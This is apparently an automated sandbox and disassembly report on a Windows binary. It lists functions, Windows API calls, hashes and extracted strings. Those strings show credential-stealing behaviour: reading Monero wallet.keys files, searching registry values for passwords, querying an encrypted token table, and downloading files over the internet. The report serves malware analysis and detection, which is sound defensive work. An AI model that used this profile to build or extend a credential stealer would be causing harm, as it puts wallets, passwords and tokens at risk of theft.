                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003B14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 26ac3a920d9eefd8633d21e3e085e6855621c88939e5650373f3e9a7d62fbe87
                            • Instruction ID: 9024eff7fe80a70003d22b7420687b43951ba4c576ac897e982c35b43cc82743
                            • Opcode Fuzzy Hash: 26ac3a920d9eefd8633d21e3e085e6855621c88939e5650373f3e9a7d62fbe87
                            • Instruction Fuzzy Hash: F1514FB295021C5BCB16EB60DC96FED737CAB54304F40459CB60AE6081EE346F89CBA6
                            Function 003B75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003B72D0: memset.MSVCRT ref: 003B7314
                              • Part of subcall function 003B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                              • Part of subcall function 003B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                              • Part of subcall function 003B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                              • Part of subcall function 003B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                              • Part of subcall function 003B72D0: HeapFree.KERNEL32(00000000), ref: 003B7459
                            • lstrcat.KERNEL32(00000000,003D17FC), ref: 003B7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 003B765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B768F
                            • lstrcat.KERNEL32(00000000,003D1804), ref: 003B76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B76D3
                            • lstrcat.KERNEL32(00000000,003D1808), ref: 003B76ED
                            • task.LIBCPMTD ref: 003B76FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                            • Instruction ID: 9a885ba8284899ad53684a27fc9360f6c434bf820ca866376cc0e5f5fd5da9c0
                            • Opcode Fuzzy Hash: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                            • Instruction Fuzzy Hash: 6D3150B2D00109EFCB06EBA4DC45EFE7778FB94305B144518F206EB690DB38A94ADB52
                            Function 003B72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 003B7314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                            • HeapFree.KERNEL32(00000000), ref: 003B7459
                            • task.LIBCPMTD ref: 003B7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                            • Instruction ID: eb87bc02d6c51890a1fba32c41175109ba454f1f5c0e8cb718ae2d4be2a6b1c7
                            • Opcode Fuzzy Hash: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                            • Instruction Fuzzy Hash: EA613AB580015C9BDB25DB50CC41BD9B7BCFF44344F0081E9E649AA541DBB06BC9CFA1
                            Function 003B60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                            • InternetOpenA.WININET(003D0DF7,00000001,00000000,00000000,00000000), ref: 003B610F
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003B618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003B61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003B61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003B620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 003B6249
                            • InternetCloseHandle.WININET(?), ref: 003B6253
                            • InternetCloseHandle.WININET(00000000), ref: 003B6260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                            • Instruction ID: 4c847b5f92547aa9aa4c472592747f4427b2d474b6c25edaf03a9891157dcf63
                            • Opcode Fuzzy Hash: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                            • Instruction Fuzzy Hash: 685151B1900218ABEF21DF50DC46FEE77B8EB44705F104498A609AB181DB786E89DF56
                            Function 003BBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • lstrlen.KERNEL32(00000000), ref: 003BBC9F
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 003BBCCD
                            • lstrlen.KERNEL32(00000000), ref: 003BBDA5
                            • lstrlen.KERNEL32(00000000), ref: 003BBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                            • Instruction ID: 8b349ba6630c5a84d4919631cb095fd2e3d384b74774e7fe4c4b960573f107c5
                            • Opcode Fuzzy Hash: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                            • Instruction Fuzzy Hash: 29B14F7291060CABCB16EBA0DC96FEE7738AF14304F40411DF506EA191EF346E49DBA2
                            Function 003C6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                            • Instruction ID: a79ac0625bf06b943f8941eb23a973f99bbf764d110ce332375c1318bccb9d38
                            • Opcode Fuzzy Hash: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                            • Instruction Fuzzy Hash: 70F03A70905209EFD344AFE0A90AF3C7B74FB15702F040198E609C6290D6786A42EBD7
                            Function 003B4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003B4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B4FD1
                            • InternetOpenA.WININET(003D0DDF,00000000,00000000,00000000,00000000), ref: 003B4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003B5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003B5041
                            • InternetCloseHandle.WININET(?), ref: 003B50B9
                            • InternetCloseHandle.WININET(?), ref: 003B50C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 5d75d00cb2f136057a69f090ea651992e8fb4f13ccfceec23e2734b0ef4a2cf7
                            • Instruction ID: bb6e9930901096d5d6535788ff3f0029f44c2ef69ed8ae39b9b69aa5b6796ac3
                            • Opcode Fuzzy Hash: 5d75d00cb2f136057a69f090ea651992e8fb4f13ccfceec23e2734b0ef4a2cf7
                            • Instruction Fuzzy Hash: 3431E6F4A00218ABDB20DF54DC85BEDB7B4EB48704F1081D9EB09A7281D7746E85DF99
                            Function 003C8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0108E3E0,00000000,?,003D0E2C,00000000,?,00000000), ref: 003C8130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003C8158
                            • wsprintfA.USER32 ref: 003C81AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                            • Instruction ID: 29721bd04ae949e26c84d7c6cc42b4900d7e71cb4257753559b294a54e916ff3
                            • Opcode Fuzzy Hash: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                            • Instruction Fuzzy Hash: ED214AB1E44208ABDB00DFD4DC49FAEB7B8FB44B10F104619F605FB280D7B869058BA6
                            Function 003C83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                            • wsprintfA.USER32 ref: 003C8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0108E2D8,00000000,000F003F,?,00000400), ref: 003C84EC
                            • lstrlen.KERNEL32(?), ref: 003C8501
                            • RegQueryValueExA.ADVAPI32(00000000,0108E260,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003D0B34), ref: 003C8599
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8608
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                            • Instruction ID: c70d5beb1f4cedb2f641c68381e998d21180b193c8f935f36136821ecee6ad10
                            • Opcode Fuzzy Hash: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                            • Instruction Fuzzy Hash: 6F2107B190021CABDB24DB54DC85FE9B3B8FB48700F00C199E609A6140DF75AE85CFD5
                            Function 003C7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C76A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C76AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C3C8,00000000,00020119,00000000), ref: 003C76DD
                            • RegQueryValueExA.ADVAPI32(00000000,0108E188,00000000,00000000,?,000000FF), ref: 003C76FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C7708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
